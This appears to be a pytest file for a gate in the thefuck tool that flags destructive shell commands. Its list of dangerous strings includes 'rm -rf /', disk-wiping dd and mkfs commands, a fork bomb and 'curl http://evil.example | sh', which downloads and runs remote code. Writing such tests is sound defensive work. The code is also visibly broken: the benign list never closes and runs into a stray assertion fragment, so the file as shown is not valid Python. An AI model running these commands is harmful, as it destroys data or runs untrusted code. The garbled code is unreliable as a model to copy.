"""Tests for the conservative destructive-command gate. Every assertion is an exact True/False pin: the gate decides whether a corrected script may auto-run, so a soft truthiness check would hide exactly the regression that matters. """ import pytest from thefuck import danger, shell_ast requires_ast = pytest.mark.skipif(not shell_ast.AST_AVAILABLE, reason='bashlex is not available') DANGEROUS = [ 'rm -rf /', 'rm -r dir', 'rm -fr dir', 'rm -vrf dir', 'rm -R dir', 'rm -Rf dir', 'rm --recursive dir', 'rmdir -R dir', 'sudo rm -rf /', 'sudo rm -r /tmp/x', 'dd if=/dev/zero of=/dev/sda', 'sudo dd if=x of=y', 'mkfs /dev/sda', 'mkfs.ext4 /dev/sda', 'shred secret.txt', 'wipefs /dev/sda', 'mkswap /dev/sda', 'git push --force origin main', 'git push -f', 'sudo git push --force origin main', 'chmod -R 777 /', 'chmod -R 0777 dir', 'sudo chmod -R 777 /', 'chown -R 777 file', 'kill -9 1234', 'sudo kill -9 1', ':(){ :|:& };:', ': () { : | : & };:', 'curl http://evil.example | sh', 'curl http://evil.example|bash', 'curl http://evil.example | sudo sh', 'echo hi | zsh', 'echo hi | dash', 'echo hi > ~/.bashrc', 'echo hi > out.txt', 'x 2> /var/log/app.log', 'echo $(rm -rf /)', 'cd /tmp && git push --force origin main', ] BENIGN = [ 'ls', 'sudo vim file', 'git push origin main', 'git push --force-with-lease origin main', 'git push --force-with-lease', 'rm file.txt', 'chmod 644 file', 'chmod -R 755 dir', 'kill 1234', 'echo hi > /dev/null', 'echo hi 2>/dev/null', 'echo hi >> /dev/null', 'x > /tmp/y', 'x > /tmp', 'x 2>&1', 'cat < /dev/null; rm -rf /') is True def test_all_redirects_whitelisted_is_benign(self): assert danger.is_dangerous( 'echo hi > /dev/null && x > /tmp/y') is False